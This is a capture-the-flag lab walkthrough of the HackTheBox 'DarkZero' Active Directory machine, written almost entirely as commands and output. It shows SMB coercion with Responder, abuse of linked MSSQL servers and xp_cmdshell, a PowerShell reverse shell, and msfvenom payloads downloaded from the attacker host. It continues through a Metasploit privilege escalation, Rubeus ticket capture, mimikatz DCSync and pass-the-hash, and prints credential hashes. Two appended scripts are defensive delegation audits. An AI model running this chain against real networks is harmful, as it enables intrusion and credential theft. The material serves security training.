AD | Medium | Windows
HTB — DarkZero
Active Directory environment with Shadow Credentials and Resource-Based Constrained Delegation abuse to achieve full domain compromise.
October 6, 2025 | HackTheBox
#AD #Shadow Credentials #RBCD #Delegation
nmap
sh
nmap -sC -sV -p- -Pn 10.10.11.89 -oN nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-06 09:55 EDT
Nmap scan report for 10.10.11.89
Host is up (0.026s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-06 20:57:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RC0+
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-05T01:58:37
|_Not valid after: 2055-10-05T01:58:37
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2025-10-06T20:58:56+00:00; +7h00m01s from scanner time.
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49907/tcp open msrpc Microsoft Windows RPC
49920/tcp open msrpc Microsoft Windows RPC
49934/tcp open msrpc Microsoft Windows RPC
49970/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-06T20:58:17
|_ start_date: N/A
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 207.12 seconds
creds
sh
As is common in real-life pentests, you will start the DarkZero box with credentials for the following account: john.w / RFulUtONCOL!
sh
╭─root@parrot /home/sake/htb/seasonal/DarkZero
╰─# nxc mssql DC01 -u john.w -p 'RFulUtONCOL!'
MSSQL 10.10.11.89 1433 DC01 [*] 10.0 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.10.11.89 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
╭─root@parrot /home/sake/htb/seasonal/DarkZero
╰─# nxc smb DC01 -u john.w -p 'RFulUtONCOL!'
SMB 10.10.11.89 445 DC01 [*] Windows 10.0 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.89 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
shares
sh
nxc smb DC01 -u john.w -p 'RFulUtONCOL!' --shares
SMB 10.10.11.89 445 DC01 [*] Windows 10.0 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.89 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
SMB 10.10.11.89 445 DC01 [*] Enumerated shares
SMB 10.10.11.89 445 DC01 Share Permissions Remark
SMB 10.10.11.89 445 DC01 ----- ----------- ------
SMB 10.10.11.89 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.89 445 DC01 C$ Default share
SMB 10.10.11.89 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.89 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.89 445 DC01 SYSVOL READ Logon server share
bloodhound
sh
sudo bloodhound-python -u 'john.w' -p 'RFulUtONCOL!' -ns 10.10.11.89 -d darkzero.htb -c all
sh
zip -r darkzero_bh.zip *.json
sh
nxc ldap 10.10.11.89 -u john.w -p 'RFulUtONCOL!' --bloodhound -c All --dns-server 10.10.11.89
SMB 10.10.11.89 445 DC01 [*] Windows 10.0 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.11.89 636 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LDAPS 10.10.11.89 636 DC01 Resolved collection methods: container, dcom, localadmin, group, acl, objectprops, trusts, rdp, psremote, session
LDAP 10.10.11.89 389 DC01 Done in 00M 05S
LDAPS 10.10.11.89 636 DC01 Compressing output into /root/.nxc/logs/DC01_10.10.11.89_2025-10-06_105558_bloodhound.zip
mssql
sh
impacket-mssqlclient john.w@dc01.darkzero.htb -windows-auth
Impacket v0.11.0 - Copyright 2023 Fortra
Password: RFulUtONCOL!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
sh
SQL (darkzero\john.w guest@master)> enable_xp_cmdshell
[-] ERROR(DC01): Line 105: User does not have permission to perform this action.
[-] ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC01): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
XP_SUBDIRS Hash Stealing
sh
SQL (darkzero\john.w guest@master)> EXEC master..xp_dirtree '\\10.10.14.4\share\'
XP_SUBDIRS Hash Stealing with Responder
shell
sudo responder -I tun0
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.4]
Responder IPv6 [dead:beef:2::1002]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-LRFS6Q5GWCB]
Responder Domain Name [88UE.LOCAL]
Responder DCE-RPC Port [45901]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.89
[SMB] NTLMv2-SSP Username : darkzero\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::darkzero:378d4a3875e72d8a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
- can't crack
sh
hashcat -m 5600 dc01_ntlmv2.txt /usr/share/wordlists/rockyou.txt
- can't impersonate
sh
SQL (darkzero\john.w guest@master)> EXEC master..xp_dirtree '\\10.10.14.4\share\'
subdirectory depth
------------ -----
SQL (darkzero\john.w guest@master)> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
name
----
enumerating links
sh
impacket-mssqlclient john.w@dc01.darkzero.htb -windows-auth
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
----------------- ---------------- ----------- ----------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
DC02.darkzero.ext SQLNCLI SQL Server DC02.darkzero.ext NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
----------------- --------------- --------------- ------------
DC02.darkzero.ext darkzero\john.w 0 dc01_sql_svc
sh
SQL (darkzero\john.w guest@master)> use_link "DC02.darkzero.ext"
sh
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
--------------------------------- ------------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 1 1 0 0 0 0 0 0 0
##MS_PolicyEventProcessingLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
##MS_PolicyTsqlExecutionLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
darkzero-ext\Domain Admins WINDOWS_GROUP 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLWriter WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\Winmgmt WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT Service\MSSQLSERVER WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT AUTHORITY\SYSTEM WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
NT SERVICE\SQLSERVERAGENT WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLTELEMETRY WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
dc01_sql_svc SQL_LOGIN 0 1 0 0 0 0 0 0 0
- we are part of the sysadmin role
sh
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> SELECT is_srvrolemember('sysadmin')
-
1
sh
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> EXEC xp_cmdshell 'whoami'
[-] ERROR(DC02): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
enabling xp_cmdshell
sh
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> EXECUTE sp_configure 'show advanced options', 1
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> RECONFIGURE
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> EXECUTE sp_configure 'xp_cmdshell', 1
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> RECONFIGURE
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell "whoami"
output
--------------------
darkzero-ext\svc_sql
NULL
reverse shell
sh
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell "powershell -e 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"
sh
rlwrap nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.89 56870
whoami
darkzero-ext\svc_sql
meterpreter rev shell
sh
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=445 -f exe > rev_meter.exe
sh
PS C:\users\svc_sql\Documents> Invoke-WebRequest http://10.10.14.4/rev_meter.exe -OutFile rev_meter.exe
sh
[msf](Jobs:0 Agents:0) >> use exploit/multi/handler
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set payload windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set lhost 10.10.14.4
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set lport 443
sh
PS C:\users\svc_sql\Documents> .\rev_meter.exe
exploit suggester
sh
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> use multi/recon/local_exploit_suggester
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> set session 1
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> run
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2022_21882_win32k Yes The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
4 exploit/windows/local/cve_2022_21999_spoolfool_privesc Yes The target appears to be vulnerable.
5 exploit/windows/local/cve_2023_28252_clfs_driver Yes The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
6 exploit/windows/local/cve_2024_30085_cloud_files Yes The target appears to be vulnerable.
7 exploit/windows/local/cve_2024_30088_authz_basep Yes The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
8 exploit/windows/local/cve_2024_35250_ks_driver Yes The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
9 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
cve_2024_30088_authz_basep
sh
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> use exploit/windows/local/cve_2024_30088_authz_basep
[msf](Jobs:0 Agents:1) exploit(windows/local/cve_2024_30088_authz_basep) >> set session 1
[msf](Jobs:0 Agents:1) exploit(windows/local/cve_2024_30088_authz_basep) >> set lhost 10.10.14.4
[msf](Jobs:0 Agents:1) exploit(windows/local/cve_2024_30088_authz_basep) >> set lport 446
sh
(Meterpreter 2)(C:\Windows\system32) > getuid
Server username: NT AUTHORITY\SYSTEM
hashdump
sh
(Meterpreter 2)(C:\Windows\system32) > hashdump
Administrator:500:aad3b435...:6963aad8...:::
Guest:501:aad3b435...:31d6cfe0...:::
krbtgt:502:aad3b435...:43e27ea2...:::
svc_sql:1103:aad3b435...:816ccb84...:::
DC02$:1000:aad3b435...:663a13eb...:::
darkzero$:1105:aad3b435...:4276fdf2...:::
user.txt
sh
C:\Users\Administrator\Desktop>type user.txt
85543c82...
sh
C:\Users\Administrator\Desktop>hostname
DC02
sh
PS C:\Users\Administrator\Documents> Invoke-WebRequest http://10.10.14.4/PowerView.ps1 -OutFile PowerView.ps1
PS C:\Users\Administrator\Documents> Import-Module .\PowerView.ps1
sh
PS C:\Users\Administrator\Documents> Get-ForestDomain
Forest : darkzero.ext
DomainControllers : {DC02.darkzero.ext}
Children : {}
DomainMode : Unknown
DomainModeLevel : 7
Parent :
PdcRoleOwner : DC02.darkzero.ext
RidRoleOwner : DC02.darkzero.ext
InfrastructureRoleOwner : DC02.darkzero.ext
Name : darkzero.ext
sh
PS C:\Users\Administrator\Documents> Get-DomainTrust
SourceName : darkzero.ext
TargetName : darkzero.htb
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : Bidirectional
WhenCreated : 7/29/2025 3:30:19 PM
WhenChanged : 9/29/2025 6:25:18 PM
adsearch
sh
Invoke-WebRequest http://10.10.14.4/ADSearch.exe -OutFile ADSearch.exe
sh
PS C:\Users\Administrator\Documents> .\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
Twitter: @tomcarver_
GitHub: @tomcarver16
[*] No domain supplied. This PC's domain will be used instead
[*] LDAP://DC=darkzero,DC=ext
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 1
[+] samaccountname : DC02$
[+] dnshostname : DC02.darkzero.ext
rubeus
sh
Invoke-WebRequest http://10.10.14.4/Rubeus.exe -OutFile Rubeus.exe
sh
PS C:\Users\Administrator\Documents> .\Rubeus.exe monitor /interval:10 /nowrap
sh
impacket-mssqlclient john.w@dc01.darkzero.htb -windows-auth
Impacket v0.11.0 - Copyright 2023 Fortra
Password: RFulUtONCOL!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
sh
SQL (darkzero\john.w guest@master)> EXEC master..xp_dirtree '\\DC02.darkzero.ext\share\'
subdirectory depth
------------ -----
sh
[*] 10/7/2025 11:15:23 AM UTC - Found new TGT:
User : DC01$@DARKZERO.HTB
StartTime : 10/7/2025 4:15:17 AM
EndTime : 10/7/2025 2:15:17 PM
RenewTill : 10/14/2025 4:15:17 AM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
[*] Ticket cache size: 7
sh
.\Rubeus.exe s4u /impersonateuser:administrator /msdsspn:cifs/dc01.darkzero.htb /user:DC01$ /ticket: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 /dc:dc01.darkzero.htb /nowrap
sharphound
sh
Invoke-WebRequest http://10.10.14.4/SharpHound.exe -OutFile SharpHound.exe
sh
.\SharpHound.exe -c All --zipfilename darkzero
sh
(Meterpreter 2)(C:\users\administrator\documents) > download 20251007044535_darkzero.zip
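The ADSearch filter above (`userAccountControl:1.2.840.113556.1.4.803:=524288`) is a bitwise test for TRUSTED_FOR_DELEGATION, and SharpHound collects the same flag plus the two msDS-* attributes behind constrained delegation and RBCD. As an added example that is not the writeup's own code, the script below reproduces that matching rule offline and classifies computer objects by delegation type so the one real finding (a DC in a trusting forest) can be told apart from the others; all sample objects, host names and SPNs are constructed.

```python
"""Audit Kerberos delegation settings on computer objects (added example,
not code from the writeup). Sample directory data is constructed."""

# userAccountControl bits as defined in [MS-ADTS]; 524288 is the mask used
# in the writeup's ADSearch query.
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000               # set on domain controllers
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation (524288)
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained + protocol transition


def ldap_bit_and(value, mask):
    """Semantics of 'attr:1.2.840.113556.1.4.803:=mask': every mask bit is set."""
    return value & mask == mask


def ldap_bit_or(value, mask):
    """Semantics of 'attr:1.2.840.113556.1.4.804:=mask': at least one bit is set."""
    return value & mask != 0


def classify_delegation(obj):
    """Return the delegation findings for one computer object (dict of LDAP attrs)."""
    uac = obj["userAccountControl"]
    findings = []
    if ldap_bit_and(uac, TRUSTED_FOR_DELEGATION):
        # DCs carry this bit by default, so a non-DC with it is the outlier to
        # fix first; a DC reachable across a forest trust is what was abused here.
        is_dc = ldap_bit_and(uac, SERVER_TRUST_ACCOUNT)
        findings.append("unconstrained (DC)" if is_dc else "unconstrained (non-DC)")
    if obj.get("msDS-AllowedToDelegateTo"):
        kind = "constrained"
        if ldap_bit_and(uac, TRUSTED_TO_AUTH_FOR_DELEGATION):
            kind += "+protocol-transition"
        findings.append(kind)
    if obj.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        findings.append("rbcd-target")
    return findings


def unconstrained_hosts(objects):
    """Same selection as the writeup's ADSearch filter, evaluated offline."""
    return [o["sAMAccountName"] for o in objects
            if o["objectCategory"] == "computer"
            and ldap_bit_and(o["userAccountControl"], 524288)]


# Constructed sample directory; only DC02$ mirrors the writeup's real result.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "DC02$", "objectCategory": "computer",
     "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "FILES01$", "objectCategory": "computer",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "WEB01$", "objectCategory": "computer",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/files01.example.local"]},
    {"sAMAccountName": "APP01$", "objectCategory": "computer",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"<constructed security descriptor>"},
]

if __name__ == "__main__":
    for obj in SAMPLE_COMPUTERS:
        print(obj["sAMAccountName"], classify_delegation(obj) or ["none"])
```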
sh
Invoke-WebRequest http://10.10.14.4/mimikatz.exe -OutFile mimikatz.exe
sh
.\Rubeus.exe renew /ticket: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 /ptt
sh
PS C:\users\administrator\documents> klist
Current LogonId is 0:0x3e7
Cached Tickets: (1)
#0> Client: DC01$ @ DARKZERO.HTB
Server: krbtgt/DARKZERO.HTB @ DARKZERO.HTB
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 10/7/2025 5:59:29 (local)
End Time: 10/7/2025 15:59:29 (local)
Renew Time: 10/14/2025 4:15:17 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
sh
.\mimikatz.exe
sh
lsadump::dcsync /domain:darkzero.htb /user:administrator
[DC] 'darkzero.htb' will be the domain
[DC] 'DC01.darkzero.htb' will be the DC server
[DC] 'administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 9/10/2025 9:42:44 AM
Object Security ID : S-1-5-21-1152179935-589108180-1989892463-500
Object Relative ID : 500
Credentials:
Hash NTLM: 5917507b...
ntlm- 0: 5917507b...
ntlm- 1: 5917507b...
lm - 0: 58ef6687...
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : eb8f12be...
* Primary:Kerberos-Newer-Keys *
Default Salt : DARKZERO.HTBAdministrator
Default Iterations : 4096
Credentials
des_cbc_md5_nt (4096) : 2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
unknow (4096) : a23315d9...
aes256_hmac (4096) : d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
aes128_hmac (4096) : b1e04b87...
rc4_hmac_nt (4096) : 5917507b...
ServiceCredentials
des_cbc_md5_nt (4096) : 2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
unknow (4096) : a23315d9...
aes256_hmac (4096) : d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
aes128_hmac (4096) : b1e04b87...
OldCredentials
des_cbc_md5_nt (4096) : 298bc77657a3737b452bb09be407d46b795774e5c3bbfcc68e8f0a4015b59459
unknow (4096) : d1d84cca...
aes256_hmac (4096) : fe0ba028010ee4f408ebc846d3f480c1880a4f0274acdb226d3afcdc3595dc21
aes128_hmac (4096) : a2a7e0e9...
rc4_hmac_nt (4096) : 5917507b...
OlderCredentials
des_cbc_md5_nt (4096) : d828032ab803aa2d52a9db423de22fe27af55a9fd2101037b106e856ef515216
unknow (4096) : 5f9f4fbb...
aes256_hmac (4096) : ead37d7deb508c2ad7fd748960cb115d0857b23d95a69cfc95fa693d9d2ca987
aes128_hmac (4096) : d027d6df...
rc4_hmac_nt (4096) : cf3a5525...
* Packages *
NTLM-Strong-NTOWF
sh
PS C:\users\administrator\documents> ping dc01.darkzero.htb
Pinging DC01.darkzero.htb [10.10.11.89] with 32 bytes of data:
Reply from 10.10.11.89: bytes=32 time<1ms TTL=127
Reply from 10.10.11.89: bytes=32 time<1ms TTL=127
Reply from 10.10.11.89: bytes=32 time<1ms TTL=127
Reply from 10.10.11.89: bytes=32 time<1ms TTL=127
winrm
sh
evil-winrm -i 10.10.11.89 -u Administrator -H "5917507b..."
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
darkzero\administrator
sh
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
adc7ceab...
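The pivot in this chain was the DC01$ TGT that Rubeus monitor caught on DC02 after the xp_dirtree coercion, later visible in klist with flags 0x60a10000. As an added example that is not the writeup's own code, the script below decodes that flags word the way klist prints it and applies a defender-side check over a constructed klist record: a forwarded TGT for another realm's machine account cached on a local host is the footprint of coerced authentication into an unconstrained-delegation system.

```python
"""Decode Kerberos ticket flags and flag cached TGTs of foreign machine
accounts (added example, not code from the writeup). The sample klist
record is constructed to match the shape of the output above."""
import re

# Ticket flag bits as Windows klist names them (RFC 4120 numbering, bit 0 = MSB).
TICKET_FLAGS = [
    (0x40000000, "forwardable"), (0x20000000, "forwarded"),
    (0x10000000, "proxiable"), (0x08000000, "proxy"),
    (0x04000000, "may_postdate"), (0x02000000, "postdated"),
    (0x01000000, "invalid"), (0x00800000, "renewable"),
    (0x00400000, "initial"), (0x00200000, "pre_authent"),
    (0x00100000, "hw_authent"), (0x00080000, "transited_policy_checked"),
    (0x00040000, "ok_as_delegate"), (0x00010000, "name_canonicalize"),
]


def decode_ticket_flags(flags):
    """Return the names of the set flags in the order klist prints them."""
    return [name for bit, name in TICKET_FLAGS if flags & bit]


def parse_klist_entry(text):
    """Pull client, server and the flags word out of one klist ticket entry."""
    client = re.search(r"Client:\s*(\S+)\s*@\s*(\S+)", text)
    server = re.search(r"Server:\s*(\S+)\s*@\s*(\S+)", text)
    flags = re.search(r"Ticket Flags\s+0x([0-9a-fA-F]+)", text)
    return {"client": client.group(1), "client_realm": client.group(2).upper(),
            "server": server.group(1), "server_realm": server.group(2).upper(),
            "flags": int(flags.group(1), 16)}


def foreign_tgt_finding(entry, local_realm):
    """Report a TGT (krbtgt/...) of another realm's machine account that was
    delegated (forwarded flag) into this host; '' when nothing is wrong."""
    names = decode_ticket_flags(entry["flags"])
    is_tgt = entry["server"].lower().startswith("krbtgt/")
    is_machine = entry["client"].endswith("$")
    is_foreign = entry["client_realm"] != local_realm.upper()
    if is_tgt and is_machine and is_foreign and "forwarded" in names:
        return (f"delegated TGT for {entry['client']}@{entry['client_realm']} "
                f"cached on a {local_realm} host")
    return ""


# Constructed record mirroring the klist entry in the writeup (ticket bytes omitted).
SAMPLE_ENTRY = """#0> Client: DC01$ @ DARKZERO.HTB
Server: krbtgt/DARKZERO.HTB @ DARKZERO.HTB
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
"""

if __name__ == "__main__":
    entry = parse_klist_entry(SAMPLE_ENTRY)
    print(decode_ticket_flags(entry["flags"]))
    print(foreign_tgt_finding(entry, "darkzero.ext"))
```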